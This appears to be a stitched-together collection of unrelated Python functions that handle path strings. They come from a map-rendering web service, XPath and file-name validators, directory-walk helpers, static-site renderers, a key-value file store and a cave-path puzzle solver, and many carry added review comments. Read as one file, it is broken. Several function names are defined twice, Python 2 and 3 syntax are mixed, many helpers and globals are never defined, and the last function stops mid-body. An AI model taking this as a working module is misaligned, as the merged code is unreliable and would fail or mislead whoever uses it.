def createJGW(path):
    """Build a JGW (JPEG world file) for the map request described by *path*.

    *path* is a '|'-separated parameter string of "key=value" fields:
    style|paper|scale|centre|title|club|mapid|start|crosses|[cps]|controls.
    Returns an open, rewound NamedTemporaryFile holding the six world-file
    lines, or an error-message string when *path* is malformed.

    NOTE(review): relies on module-level `mapnik` and `math`; the centre
    coordinates are parsed as ints and appear to be spherical-mercator
    metres (they are inverse-projected below) -- confirm against callers.
    """
    import tempfile
    # Spherical-mercator projection string, used to recover the WGS84 latitude.
    EPSG900913 = "+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs +over"
    # Paper-size (metres) to pixels conversion factor.
    S2P = 360.0 / 0.127
    # Default page margins in metres: north, east, south, west.
    MAP_NM = 0.014
    MAP_EM = 0.008
    MAP_SM = 0.013
    MAP_WM = 0.008
    if path.count("|") < 9 or path.count("|") > 10 or len(path) < 30:
        return "Incorrectly formatted string."
    if path.count("|") == 9:
        # Older request form without the "cps" field: pad so split() yields 11 parts.
        path = path + "|"
    style, paper, scale, centre, title, club, mapid, start, crosses, cps, controls = path.split(
        "|")
    style = style.split("=")[1]
    paper = paper.split("=")[1]
    PAPER_W = float(paper.split(",")[0])
    PAPER_H = float(paper.split(",")[1])
    scale = int(scale.split("=")[1])
    centre = centre.split("=")[1]
    clat = int(centre.split(",")[0])
    clon = int(centre.split(",")[1])
    projection = mapnik.Projection(EPSG900913)
    # True latitude of the map centre, needed for the mercator scale distortion.
    wgs84lat = mapnik.Coord(clon, clat).inverse(projection).y
    scaleCorrectionFactor = math.cos(wgs84lat * math.pi / 180)
    scaleCorrected = scale / scaleCorrectionFactor
    if style == "adhoc":
        # Ad-hoc style uses the same (west) margin on all four sides.
        MAP_EM = MAP_WM
        MAP_NM = MAP_WM
        MAP_SM = MAP_WM
    MAP_W = PAPER_W - MAP_WM - MAP_EM
    MAP_H = PAPER_H - MAP_NM - MAP_SM
    # Paper corner coordinates in projected metres.
    paperSLat = clat - (MAP_H / 2 + MAP_SM) * scaleCorrected
    paperNLat = clat + (MAP_H / 2 + MAP_NM) * scaleCorrected
    paperWLon = clon - (MAP_W / 2 + MAP_WM) * scaleCorrected
    paperELon = clon + (MAP_W / 2 + MAP_EM) * scaleCorrected
    PIXEL_W = PAPER_W * S2P
    PIXEL_H = PAPER_H * S2P
    # Six-line ESRI world file: x pixel size, two rotation terms,
    # y pixel size (negative via S-N ordering), then the top-left origin.
    fworld = tempfile.NamedTemporaryFile()
    fworld.write(str((paperELon - paperWLon) / PIXEL_W) + "\n")
    fworld.write(str(0) + "\n")
    fworld.write(str(0) + "\n")
    fworld.write(str((paperSLat - paperNLat) / PIXEL_H) + "\n")
    fworld.write(str(paperWLon) + "\n")
    fworld.write(str(paperNLat) + "\n")
    fworld.seek(0)
    return fworld
def processRequest(req):
    """mod_python handler: build and serve a KMZ for the map request.

    Logs the request, delegates to createKMZ(), then either streams the
    resulting .kmz as an attachment or renders an HTML error page
    (createKMZ signals failure by returning a string -- tested via isStr).

    NOTE(review): the format validation runs *after* createKMZ(path) has
    already been invoked -- confirm this ordering is intentional.
    """
    from mod_python import apache, util
    path = req.args
    # Access log; `home` is a module-level installation root.
    with open(home + "/logs/oommakerlog-kmz-access.txt", "a") as fa:
        fa.write(time.strftime('%x %X') + " : " + req.get_remote_host() + " : " + path + "\n")
    outf = createKMZ(path)
    if path.count("|") < 9 or path.count("|") > 10 or len(path) < 30:
        return "Incorrectly formatted string."
    if path.count("|") == 9:
        # Pad the optional "cps" field so split() yields 11 parts.
        path = path + "|"
    style, paper, scale, centre, title, club, mapid, start, crosses, cps, controls = path.split("|")
    mapid = mapid.split("=")[1]
    if isStr(outf):
        # createKMZ returned an error message rather than a file object.
        req.status = apache.HTTP_SERVICE_UNAVAILABLE
        req.content_type = 'text/html'
        outHTML = "<html><head><title>OpenOrienteeringMap: Error</title></head><body><h1>Error</h1><p>" + outf + "</p></body></html>"
        req.write(outHTML)
        with open(home + "/logs/oommakerlog-kmz-error.txt", "a") as fe:
            fe.write(time.strftime('%x %X') + " : " + req.get_remote_host() + " : " + outf + " : " + path + "\n")
        return req
    else:
        # Stream the generated KMZ back as a download.
        outfsize = os.fstat(outf.fileno()).st_size
        req.status = apache.HTTP_OK
        req.content_type = 'application/vnd.google-earth.kmz'
        req.headers_out["Content-Disposition"] = "attachment; filename=\"oom_" + mapid + ".kmz\""
        req.set_content_length(outfsize)
        req.write(outf.read())
        return req
def processRequest(req):
    """mod_python handler: build and serve a JGW world file for the request.

    Logs the request, then either streams the produced file as a .jgw
    attachment or renders an HTML error page (failure is signalled by the
    builder returning a string -- tested via isStr).

    NOTE(review): this handler calls createJPG() yet serves a ".jgw"
    attachment, and validation runs after createJPG() -- confirm both.
    """
    from mod_python import apache, util
    path = req.args
    # Access log; `home` is a module-level installation root.
    with open(home + "/logs/oommakerlog-jgw-access.txt", "a") as fa:
        fa.write(time.strftime('%x %X') + " : " + req.get_remote_host() + " : " + path + "\n")
    outf = createJPG(path)
    if path.count("|") < 8 or path.count("|") > 9 or len(path) < 30:
        return "Incorrectly formatted string."
    if path.count("|") == 8:
        # Pad the optional final field so split() yields 10 parts.
        path = path + "|"
    style, paper, scale, centre, title, club, mapid, start, crosses, controls = path.split("|")
    mapid = mapid.split("=")[1]
    if isStr(outf):
        # The builder returned an error message rather than a file object.
        req.status = apache.HTTP_SERVICE_UNAVAILABLE
        req.content_type = 'text/html'
        outHTML = "<html><head><title>OpenOrienteeringMap: Error</title></head><body><h1>Error</h1><p>" + outf + "</p></body></html>"
        req.write(outHTML)
        with open(home + "/logs/oommakerlog-jgw-error.txt", "a") as fe:
            fe.write(time.strftime('%x %X') + " : " + req.get_remote_host() + " : " + outf + " : " + path + "\n")
        return req
    else:
        # Stream the world file back as a download.
        outfsize = os.fstat(outf.fileno()).st_size
        req.status = apache.HTTP_OK
        req.content_type = 'text/plain'
        req.headers_out["Content-Disposition"] = "attachment; filename=\"oom_" + mapid + ".jgw\""
        req.set_content_length(outfsize)
        req.write(outf.read())
        return req
def illegalPath(path):
    """Validate an XPath-like path string.

    Returns (True, reason) when *path* is illegal, (False, "") when ok.
    Checks, in order: character whitelist, placement of 'text()', and
    placement/kind of selectors.  Relies on the module-level helpers
    getSelectors, isAttrSelector and isIndexSelector.
    """
    # Illegal characters in path?
    legal = ['.', ',', '-', '_', '"', "'", '(', ')', '/', '[', ']']
    punctuation = string.punctuation
    for b in legal:
        punctuation = punctuation.replace(b, '')
    ok = True not in [p in string.whitespace for p in path]  # no whitespace chars
    ok = ok and (False not in [p in string.printable for p in path])  # must only contain printable chars
    ok = ok and (True not in [p in punctuation for p in path])  # must not contain punctuation chars
    # Parentheses may only come from 'text()', so each paren count must
    # equal the number of 'text()' occurrences.
    ok = ok and (path.count('text()') == path.count('(') and path.count('text()') == path.count(')'))
    if not ok:
        return (True, "Illegal characters found in %s" % path)
    # Badly constructed path?  At most one 'text()', and only at the end.
    bad = path.count('text()') > 1 or ('text()' in path and not path.endswith('text()'))
    if bad:
        return (True, "%s: Illegally placed 'text()'." % path)
    # Bad use of selectors in path?
    selectors = getSelectors(path, True)  # get only attribute selectors i.e. a['hello'], rather than, say, a[9]
    if selectors:
        bad = len(selectors) > 1
        bad = bad or (selectors[0] not in path.split('/')[-1])  # bad = selector not at end of path
        bad = bad or (False in [a[0] == '/' for a in path.split(']')[1:] if a])  # bad = selector not followed by '/' or end of path
        bad = bad or (not isAttrSelector(selectors[0]) and not isIndexSelector(selectors[0]))
        if bad:
            return (True, "%s: Illegally placed attribute selector(s)." % path)
    # All ok
    return (False, "")
def get_deepth(path):
    """Return the 1-based directory depth of *path* for the current OS.

    Leading/trailing separators are ignored; on operating systems other
    than Windows and Linux the depth is reported as 0.
    """
    system_name = platform.system()
    if system_name == "Windows":
        return path.strip("\\").count("\\") + 1
    if system_name == "Linux":
        return path.strip("/").count("/") + 1
    return 0
def _probably_filename(path):
    """Heuristically decide whether *path* looks like a file name.

    Rejects over-long strings, prose-like strings (several sentences,
    newlines or comma-separated clauses) and paths containing an
    over-long component; an existing path is always accepted.
    PATH_SIZE_LIMIT and FILENAME_SIZE_LIMIT are module-level constants.
    """
    if len(path) > PATH_SIZE_LIMIT:
        return False
    elif os.path.exists(path):
        # A path that exists on disk is certainly a filename.
        return True
    elif path.count('. ') >= 3 or path.count('\n') >= 3 or path.count(', ') >= 3:
        # Looks like prose rather than a path.
        return False
    elif max(len(filename) for filename in path.split('/')) > FILENAME_SIZE_LIMIT:
        return False
    else:
        return True
def mtimelevel(path, level):
    """Return the newest st_mtime among *path* and its subdirectories.

    Traversal depth is bounded by *level* (level == -1 means unlimited)
    via the module-level walklevel() helper.
    """
    mtime = os.stat(path).st_mtime
    for dirpath, dirnames, _ in walklevel(path, level):
        # Keep only directories whose separator-count depth relative to
        # *path* stays within *level*.
        dirlist = [os.path.join("/", dirpath, d) for d in dirnames
                   if level == -1 or dirpath.count(os.path.sep) - path.count(os.path.sep) <= level]
        # [-1] guards max() against an empty directory list.
        mtime = max(mtime, max([-1] + [os.stat(d).st_mtime for d in dirlist]))
    return mtime
def pop_path_rev(path2):
    """Return the first component of a '/'-separated path.

    If path is hello/world then this returns "hello"; a path containing
    no '/' yields the empty string.

    Cleanup: the original copied the (immutable) string with copy.copy,
    used the Python-3-removed string.split() function, and obtained the
    first component by reversing the pieces and popping -- a single
    bounded split is equivalent.
    """
    if "/" not in path2:
        return ""
    return path2.split("/", 1)[0]
def build_respath(path, sep=os.path.sep, bw=".."):
    """Build the resource path back to root ("../../...") for *path*.

    Returns *bw* + *sep* repeated once per component of *path*
    (component count = path.count(sep) + 1), or False when *path* is
    empty or contains os.path.altsep.

    Bug fix: on POSIX systems os.path.altsep is None, and
    str.count(None) raises TypeError -- the altsep check is now only
    performed when altsep is actually defined.
    """
    if os.path.altsep and path.count(os.path.altsep) > 0:
        # altsep in the path gives unpredictable results; refuse.
        return False
    if not path:
        return False
    count = path.count(sep) + 1
    return (bw + sep) * count
def createSurveyList(tree, startinglevel, depth):
    """
    Create a list of tuples (fileName, dateOfLastModif) for every
    directory and file found in the tree, limited to entries whose
    directory is no deeper than *depth*.

    :param tree: tree, a list of (path, dirs, files) triples as produced by os.walk
    :type tree: list
    :param startinglevel: starting level used to compute the current depth
    :type startinglevel: int
    :param depth: maximum depth of supervision
    :type depth: int
    :return listOfModifFiles: list of (path, mtime) tuples
    :rtype listOfModifFiles: list
    """
    listOfModifFiles = []
    i = 0
    while (i < len(tree)):
        path, dirs, files = tree[i]
        # Depth of this directory relative to the supervision root.
        level = path.count(os.sep) - startinglevel
        if (level <= depth):
            for dir in dirs:
                modifTime = os.path.getmtime(os.path.join(path, dir))
                listOfModifFiles += [(path + '/' + dir, modifTime)]
            for file in files:
                modifTime = os.path.getmtime(os.path.join(path, file))
                listOfModifFiles += [(path + '/' + file, modifTime)]
        i += 1
    return (listOfModifFiles)
def process(jinja, path):
    """Render one markdown source file through the 'page.tmpl' template.

    Reads *path* via util.read_header_file (headers plus markdown body),
    converts the body to HTML with the smarty extension, and writes
    <path>.html next to the source only when the output changed.
    """
    try:
        headers, content = util.read_header_file(path)
    except:
        # Identify the offending file before re-raising.
        print "when processing '%s':" % path
        raise
    html = markdown.markdown(content.decode('utf-8'), extensions=['smarty'],
        extension_configs={
            'smarty': {
                'smart_quotes': False,
                'smart_ellipses': False,
                'substitutions': {
                    # NOTE(review): 'ndash' is substituted with an em-dash
                    # character here -- confirm this is intended.
                    'ndash': '—',
                },
            }
        }).encode('utf-8')
    attrs = {
        'content': html,
        # Relative prefix back to the site root, from the directory depth.
        'root': '../' * (path.count('/') - 1),
    }
    attrs.update(headers)
    output = jinja.get_template('page.tmpl').render(**attrs)
    output_path = os.path.splitext(path)[0] + '.html'
    util.write_if_changed(output_path, output)
def print_channel_structure(xmlcontent):
    """ print out xml tree structure using algorithm from stackoverflow.com """
    # Bug fix: this parse was commented out, which left xml_root undefined
    # (NameError on the first use below) and the xmlcontent parameter unused.
    xml_root = etree.fromstring(xmlcontent)
    raw_tree = etree.ElementTree(xml_root)
    # Map each distinct element path to the attribute names seen on it.
    nice_tree = collections.OrderedDict()
    for tag in xml_root.iter():
        # Strip positional predicates such as "/a/b[2]" down to "/a/b".
        path = re.sub(r"\[[0-9]+\]", "", raw_tree.getpath(tag))
        if path not in nice_tree:
            nice_tree[path] = []
        if tag.keys():
            nice_tree[path].extend(
                attrib for attrib in tag.keys() if attrib not in nice_tree[path]
            )
    for path, attribs in nice_tree.items():
        # Indent proportionally to the element's depth in the tree.
        indent = int(path.count("/") - 1)
        print(
            "{0}{1}: {2} [{3}]".format(
                " " * indent,
                indent,
                path.split("/")[-1],
                ", ".join(attribs) if attribs else "-",
            )
        )
def getDepth(path):
    """
    Return the depth of a given path, zero-based from root ('/')
    """
    return 0 if path == '/' else path.count('/')
def listdir(self, dirname, walk=False, owner=None, limit=0, open_files=False,
            delimiter=u'/', rev=None, start_file=None, **kwargs):
    """Yield entries under *dirname* from the versioned key-value store.

    :param walk: when True, recurse into subdirectories instead of
        yielding only direct children.
    :param owner: when given, entries this owner cannot read are skipped.
    :param limit: stop after this many entries (0 = unlimited).
    :param open_files: yield read-mode VersionedFile objects instead of
        ListInfo metadata records.
    :param rev: resolve history against this revision (defaults to each
        entry's own revision).
    :param start_file: begin the range scan at this path instead of the
        start of *dirname*.
    """
    if delimiter:
        # Normalise, preserving a caller-supplied trailing delimiter
        # (normpath strips it).
        nd = os.path.normpath(dirname)
        if dirname.endswith(delimiter) and not nd.endswith(delimiter):
            nd += delimiter
        dirname = nd
    count = 0
    # Key range covering every path that starts with dirname.
    start = self._make_file_key(dirname)[:-1]
    end = start + b'\xff'
    if start_file:
        start = self._make_file_key(start_file)
    nc = dirname.count(delimiter)  # depth of the listing root
    unpack = self._files.unpack
    with self._begin(buffers=True) as tr, closing(tr.get_range(start, end)) as kr:
        for k, v in kr:
            k = unpack(k)[0]
            path = u'/' + u'/'.join(k)
            # Non-walk mode: skip entries nested deeper than the root.
            if not walk and path.count(delimiter) > nc:
                continue
            finfo = FileInfo.from_bytes(v)
            if finfo.flag == OP_DELETED:
                continue
            elif owner and not self.check_perm(
                    path, owner=owner, raise_exception=False, tr=tr):
                continue
            if not finfo.history_key:
                finfo.history_key = self.make_history_key(path)
            hist = self._get_history_for_rev(tr, path, finfo.history_key, rev or finfo.rev)
            meta = ListInfo.from_records(hist, finfo)
            meta.path = path
            if open_files:
                yield VersionedFile(self, path, mode=Perm.read, requestor=owner, file_info=meta)
            else:
                yield meta
            if limit:
                count += 1
                if count == limit:
                    break
def init(path):
    """Initialise the shared-memory GC at *path* (expected form "/name").

    Raises OSError when the path is malformed or lib.GC_init fails.  The
    allocated gc_info structure is stored on the function object itself
    so it is not garbage-collected.
    """
    if path.count('/') != 1:
        raise OSError('%r should contain exactly one slash' % path)
    ret = lib.GC_init(path)
    if not ret:
        raise OSError('Failed to initialized the shm GC')
    #
    if init.gc_info is None:
        init.gc_info = allocate_gc_info(path)  # to keep it alive
def getDepth(path):
    """
    Return the depth of a given path, zero-based from root ('/')
    """
    logger.debug("getDepth: %s", path)
    if path != '/':
        return path.count('/')
    return 0
def traverse(source_path, process):
    """Traverse folder structure from source_path and apply process function to
    each step.

    Parameters:
    ------
    source_path: path to traverse
    process: function (level, root, dirs, files) returning a list of actions

    Returns:
    actions: list of actions
    """
    patterns = read_gitignore(source_path)
    # Depth = total separator count; handles both '\\' and '/' paths.
    level = lambda path: path.count("\\") + path.count("/")
    base_level = level(source_path)
    actions = []
    for root, dirs, files in os.walk(source_path):
        # Prune ignored entries in place so os.walk skips them.
        remove_ignored(dirs, patterns, is_dir=True)
        remove_ignored(files, patterns)
        actions.extend(process(level(root) - base_level, root, dirs, files))
    return actions
def iterfind(self, path=None, namespaces=None):
    """XML resource tree iterfind selector.

    Non-lazy resources are selected directly in memory.  Lazy resources
    are re-parsed incrementally with iterparse, yielding matching
    elements and clearing them afterwards to bound memory usage.
    """
    if not self._lazy:
        # Fully loaded tree: select in memory and return.
        if path is None:
            yield self._root
        else:
            for e in iter_select(self._root, path, namespaces, strict=False):
                yield e
        return
    elif self.seek(0) == 0:
        resource = self.source
    elif self._url is not None:
        resource = urlopen(self._url, timeout=self.timeout)
    else:
        self.load()
        resource = StringIO(self._text)
    try:
        if path is None:
            # No path: yield only the document root, once fully parsed.
            level = 0
            for event, elem in self.iterparse(resource, events=('start', 'end')):
                if event == "start":
                    if level == 0:
                        self._root.clear()
                        self._root = elem
                    level += 1
                else:
                    level -= 1
                    if level == 0:
                        yield elem
                        elem.clear()
        else:
            selector = Selector(path, namespaces, strict=False, parser=XmlResourceXPathParser)
            # Normalise the path to derive the tree depth it addresses.
            path = path.replace(' ', '').replace('./', '')
            path_level = path.count('/') + 1 if path != '.' else 0
            # Paths built only from '*' and '/' match every element at
            # that depth, skipping the per-element selector check.
            select_all = '*' in path and set(path).issubset({'*', '/'})
            level = 0
            for event, elem in self.iterparse(resource, events=('start', 'end')):
                if event == "start":
                    if level == 0:
                        self._root.clear()
                        self._root = elem
                    level += 1
                else:
                    level -= 1
                    if level == path_level and \
                            (select_all or elem in selector.select(self._root)):
                        yield elem
                        elem.clear()
                    elif level == 0:
                        elem.clear()
    finally:
        # Close only resources opened by this call.
        if self.source is not resource:
            resource.close()
def get_path_from_sys(i):
    """Reassemble a space-split path from the module-level arg_list,
    starting at index *i*, until the accumulated string contains 7
    slashes.  Returns (path, next_index).

    NOTE(review): the hard-coded slash count of 7, the dependence on the
    global arg_list, and the re-inserted ' ' separator all look fragile;
    an input with fewer than 7 slashes would run past the end of
    arg_list (IndexError) -- confirm against the expected argv format.
    """
    slash = 0
    path_list = []
    while (slash < 7):
        path_list.append(arg_list[i])
        path = ''.join(path_list)
        if path[-1:] != '/':
            # Restore the space the shell split on.
            path_list.append(' ')
        slash = path.count("/")
        i += 1
    return path, i
def next_node(graph, node, small_cave, all_paths, path=None):
    """Depth-first enumeration of cave paths from *node* to 'end'.

    Small caves (per the module-level is_small()) may appear at most once
    in a path, except *small_cave*, which may appear twice.  Every
    completed path is appended to *all_paths*.

    Bug fix: the original did path.append('end') before recording the
    path, mutating the list that the remaining neighbour iterations copy
    from -- so paths explored after an 'end' neighbour carried a spurious
    'end' element, and the recorded list object could be mutated later.
    Recording a fresh list (path + [n]) leaves *path* untouched.
    """
    if path is None:
        path = []
    path.append(node)
    for n in graph[node]:
        if n == 'end':
            # Record a completed path without mutating the shared list.
            all_paths.append(path + [n])
        elif not (is_small(n) and n in path) or n == small_cave and path.count(n) < 2:
            next_node(graph, n, small_cave, all_paths, path.copy())
def calcRelativePathToTop(self, path):
    """Return the relative path ("..", "../..", ...) climbing from *path*
    up towards self.top, or "." when there is nothing to climb."""
    count = path.count(os.path.sep) - self.top.count(os.path.sep) - 1
    print("log:", path, count)
    if count <= 0:
        return "."
    return "/".join([".."] * count)
def extract_name(path):
    """Return the final component of *path* after stripping one trailing
    '/', the substring 'copy', the substring '.tif' and all spaces.

    Raises ValueError when no '/' remains after the cleanup, and
    IndexError on an empty *path* (same as the original).
    """
    if path[-1] == '/':
        path = path[:-1]
    for junk in ('copy', '.tif', ' '):
        path = path.replace(junk, '')
    # Everything after the last remaining slash is the name.
    return path[path.rindex('/') + 1:]
def common_prefixes(self, prefix, delimiter):
    """Return (name, count) pairs for the distinct first-level path
    components under *prefix* -- analogous to S3 "common prefixes".
    """
    # Key range covering every stored path starting with prefix.
    start = self._make_file_key(prefix)[:-1]
    end = start + b'\xff'
    nc = prefix.count(delimiter)  # NOTE(review): nc is computed but unused
    pref = collections.defaultdict(int)
    with self._begin() as tr:
        for k, v in tr.get_range(start, end):
            k = self._files.unpack(k)[0]
            path = u'/' + u'/'.join(k)
            # Make the path relative to the prefix.
            path = path.replace(prefix, '', 1)
            # Keep only direct children: exactly one delimiter left.
            if path != prefix and path.count(delimiter) == 1:
                pref[path.split(delimiter)[0]] += 1
    return pref.items()
def open_readonly(path):
    """Open an existing shared-memory GC at *path* (expected form "/name").

    Raises OSError when the path is malformed or lib.GC_open fails, and
    ValueError when the mapped gc_info does not carry the expected magic.
    """
    if path.count('/') != 1:
        raise OSError('%r should contain exactly one slash' % path)
    ret = lib.GC_open(path)
    if not ret:
        raise OSError('Failed to open the shm GC')
    #
    # sanity check
    gc_info = get_gc_info()
    if gc_info.magic != GC_INFO_MAGIC:
        raise ValueError("The gc_info global does not seem to be at the address 0x%x, "
                         "or it has been corrupted" % GC_INFO_ADDRESS)
    #
    # now, we need to enable writing to the RW part of the memory
    # NOTE(review): the comment above says "enable writing" but PROT_READ
    # is passed -- confirm which is intended.
    protect_GC_memory(lib.PROT_READ)
def build_respath(path, bw="..", is_web=True):
    """Build the resource path back to root from an existing path.

    Returns *bw* + separator repeated once per component of *path*
    (component count = path.count(os.path.sep) + 1); in web mode the
    separator is '/' and a trailing separator is trimmed when there is
    more than one component.  Returns False for an empty path or one
    containing os.path.altsep.

    Bug fix: on POSIX systems os.path.altsep is None, and
    str.count(None) raises TypeError -- the altsep check is now only
    performed when altsep is actually defined.
    """
    if os.path.altsep and path.count(os.path.altsep) > 0:
        # altsep in the path gives unpredictable results; refuse.
        return False
    if not path:
        return False
    sep = "/" if is_web else os.path.sep
    count = path.count(os.path.sep) + 1
    resdata = (bw + sep) * count
    if is_web and count > 1:
        # Drop the trailing '/' for multi-step web paths.
        resdata = resdata[:-1]
    return resdata
def walk_level(path, level=-1):
    """Similar to os.walk function but with yielding current level from 'path'.

    Argument 'level' -- how deep the recursion will go (if less than 0 then
    there is no limit).

    from: http://stackoverflow.com/a/234329
    """
    num_sep = path.count(os.sep)
    for root, dirnames, filenames in os.walk(path):
        # Depth of this directory relative to the starting path.
        cur_level = root.count(os.sep) - num_sep
        yield root, dirnames, filenames, cur_level
        if level >= 0 and cur_level >= level:
            # it omits directories under some level
            # you can read about this trick in python docs
            del dirnames[:]
def __init__(self, path = None, run = None):
    """Locate a run either by filesystem *path* or by *run* name.

    Arguments that look reversed are swapped: a *path* without '/' is
    treated as a run name, and a *run* containing '/' as a path.  A
    missing value is then derived from the other (path defaults to
    default_path/run, run to basename(path)).
    """
    assert (path is not None) or (run is not None)
    if path is not None:
        if path.count('/') == 0:
            # Bare name passed as path -> treat it as the run name.
            run, path = path, run
    if run is not None:
        if run.count('/') != 0:
            # Path-like value passed as run -> swap back.
            run, path = path, run
    if path is not None:
        path = os.path.abspath(os.path.expanduser(os.path.expandvars(path)))
    else:
        # No path given: look up the run under the module default_path.
        path = os.path.join(default_path, run)
    if run is None:
        run = os.path.basename(path)
    self.path = path
    self.run = run
    self.dumps = dict()
def guess_pkgname_and_version(path):
    """Split a distribution filename into (pkgname, version).

    Wheels are delegated to _guess_pkgname_and_version_wheel(); for
    other archives the suffix is stripped (module-level
    _archive_suffix_rx) and the name/version boundary is located at a
    '-' that introduces a version-like token.
    """
    path = os.path.basename(path)
    if path.endswith(".whl"):
        return _guess_pkgname_and_version_wheel(path)
    path = _archive_suffix_rx.sub('', path)
    if '-' not in path:
        pkgname, version = path, ''
    elif path.count('-') == 1:
        pkgname, version = path.split('-', 1)
    elif '.' not in path:
        # Several dashes but no dots: version is the last dash component.
        pkgname, version = path.rsplit('-', 1)
    else:
        # Split before a dash followed by something version-like.
        parts = re.split(r'-(?=(?i)v?\d+[\.a-z])', path)
        pkgname = '-'.join(parts[:-1])
        version = parts[-1]
    return pkgname, version
def __find_in_path(path, term, max_depth=10):
    """Find file under path.

    Walks *path* up to *max_depth* levels deep and returns the sorted
    paths of files and directories matching the fnmatch pattern *term*.
    """
    found = []
    path_slash_count = path.count("/")
    for root, dirnames, filenames in os.walk(path):
        if max_depth and root.count("/") - path_slash_count >= max_depth:
            # Prune: in-place clearing stops os.walk from descending.
            del dirnames[:]
            continue
        # TODO: limit to file|dir|both
        filenames = fnmatch.filter(filenames, term)
        found.extend([os.path.join(root, filename) for filename in filenames])
        # Directories get a trailing '/' so patterns like "name/" match.
        dirnames = [dirname + "/" for dirname in dirnames]
        # NOTE(review): rebinding dirnames (rather than mutating in place)
        # does NOT prune the walk -- confirm that descending into
        # non-matching directories is intended here.
        dirnames = fnmatch.filter(dirnames, term)
        found.extend([os.path.join(root, dirname) for dirname in dirnames])
    return sorted(found)
def __init__(self, name, namespaces, base_uri, attrs):
    """Store one schema element and validate its attributes.

    Raises PrangException when: 'datatypeLibrary' is not an absolute,
    properly %-escaped URI without fragment; an 'element' carries
    attributes beyond name/ns/datatypeLibrary; a name attribute of
    element/attribute is not a QName or of ref/define not an NCName; or
    an 'href' URI carries a fragment identifier.
    """
    self._parent = None
    self.name = name
    self.namespaces = namespaces
    self.base_uri = base_uri
    self.attrs = attrs
    self._children = []
    if "datatypeLibrary" in self.attrs:
        library = self.attrs["datatypeLibrary"]
        if library != "":
            lib_parts = urlparse(library)
            path = lib_parts[2]
            # The path must be properly %-escaped: unquoting removes
            # exactly two characters per escape sequence.
            num_percent = path.count("%")
            path_unquote = urllib.parse.unquote(path)
            valid = len(path) == len(path_unquote) + 2 * num_percent
            # lib_parts[0] is the scheme, lib_parts[5] the fragment.
            if lib_parts[0] == "" or path == "" or not valid or lib_parts[5] != "":
                raise PrangException(
                    "The 'datatypeLibrary' attribute must be an absolute "
                    "URI. The value of the attribute is '" + library + "'."
                )
    if self.name == "element":
        actual = set(self.attrs.keys())
        allowed = set(("name", "ns", "datatypeLibrary"))
        if actual > allowed:
            raise PrangException(
                "An 'element' element's attribute names must be a subset "
                "of " + str(allowed) + ". The actual attributes are " + str(actual)
            )
        if "name" in self.attrs:
            validate_qname(self.attrs["name"].strip())
    if self.name == "attribute":
        if "name" in self.attrs:
            validate_qname(self.attrs["name"].strip())
    if self.name == "ref":
        if "name" in self.attrs:
            validate_ncname(self.attrs["name"].strip())
    if self.name == "define":
        if "name" in self.attrs:
            validate_ncname(self.attrs["name"].strip())
    if "href" in self.attrs:
        if urllib.parse.urlparse(self.attrs["href"]).fragment != "":
            raise PrangException("The href attribute can't contain a URI with a fragment "
                                 "identifier.")
def __init__(self, path=None, run=None):
    """Locate a run either by filesystem *path* or by *run* name.

    Arguments that look reversed are swapped: a *path* without '/' is
    treated as a run name, and a *run* containing '/' as a path.  A
    missing value is then derived from the other (path defaults to
    default_path/run, run to basename(path)).
    """
    assert (path is not None) or (run is not None)
    if path is not None:
        if path.count('/') == 0:
            # Bare name passed as path -> treat it as the run name.
            run, path = path, run
    if run is not None:
        if run.count('/') != 0:
            # Path-like value passed as run -> swap back.
            run, path = path, run
    if path is not None:
        path = os.path.abspath(os.path.expanduser(
            os.path.expandvars(path)))
    else:
        # No path given: look up the run under the module default_path.
        path = os.path.join(default_path, run)
    if run is None:
        run = os.path.basename(path)
    self.path = path
    self.run = run
    self.dumps = dict()
def hasExtension(path):
    """Query if the last part of a path has a file extension.

    A file extension is any part after the last dot inclusively.

    @param path: The path to check.
    @type path: string
    @return: True if the path has an extension, otherwise False.
    @rtype: bool
    """
    # Start of the final path component: just past the last slash of
    # either kind (rfind's -1 on a miss becomes 0 after the +1).
    start = path.rfind("\\")
    start = max(path.rfind("/", start + 1), start) + 1
    dot = path.rfind(".", start)
    if dot <= start:
        # No dot, or the component begins with the dot (e.g. ".bashrc").
        return False
    # Reject components where everything before the dot is itself dots.
    return path.count(".", start, dot) != dot - start
def process(default_template, path):
    """Render a markdown source file through *default_template* into
    <path>.html.

    The template receives the converted content, the file's last-modified
    date, a relative 'root' prefix, plus any headers parsed from the file.
    """
    try:
        headers, content = util.read_header_file(path)
    except:
        # Identify the offending file before re-raising.
        print "when processing '%s':" % path
        raise
    mtime = time.localtime(os.path.getmtime(path))
    attrs = {'content': markdown.markdown(content),
             'lastupdate': time.strftime('%Y-%m-%d', mtime),
             # Relative prefix back to the site root, from directory depth.
             'root': '../' * (path.count('/') - 1)}
    attrs.update(headers)
    output = default_template.evaluate(attrs)
    output_path = os.path.splitext(path)[0] + '.html'
    util.write_if_changed(output_path, output)
def remove_mez(message, collected, updates):
    """Remove the entry named in *message* from the *collected* structure,
    recording the removal in *updates* and keeping the per-category and
    overall counters consistent.  Returns (collected, updates).
    """
    # remove existing
    path = message.message[len(MEZ_BEGIN) + 1:]
    # "category/title", or a bare title under the default category.
    category, title = path.split('/') if path.count('/') == 1 else ('የምስጋና', path)
    if category in collected['data']:
        if title in collected['data'][category]['data']:
            cat_info = collected['data'][category]
            sender = cat_info['data'][title]['sender']
            updates[title] = {'type': 'remove', 'sender': sender}
            # update counts
            collected['count_eng'] -= 1
            if cat_info['count_eng'] == 1:
                # if it is the last of its kind
                del collected['data'][category]
            else:
                cat_info['count_eng'] -= 1
                # Keep the Geez-numeral display count in sync.
                cat_info['count'] = geez_num(cat_info['count_eng'])
                del cat_info['data'][title]
    return collected, updates
def stripExtension(path):
    """Return the part of the path before the extension.

    @param path: The path to split.
    @type path: string
    @return: The part of the path before the extension.
    @rtype: string
    """
    # Start of the final path component: just past the last slash of
    # either kind (rfind's -1 on a miss becomes 0 after the +1).
    start = path.rfind("\\")
    start = max(path.rfind("/", start + 1), start) + 1
    dot = path.rfind(".", start)
    # Only strip when a genuine extension exists: the dot is not the
    # component's first character and the prefix isn't all dots.
    if dot > start and path.count(".", start, dot) != dot - start:
        return path[:dot]
    return path
def savePath():
    """Prompt for a shapefile save path and normalise it to end in '.shp'.

    Returns the chosen path, or None when the dialog is cancelled, the
    name contains more than one dot (rejected with an error box), or an
    exception occurs (reported via printErrorMessage).
    """
    try:
        path = pa.SaveDialog(msgDict["SaveDialog"], "", "~/")
        if path is None:
            return None
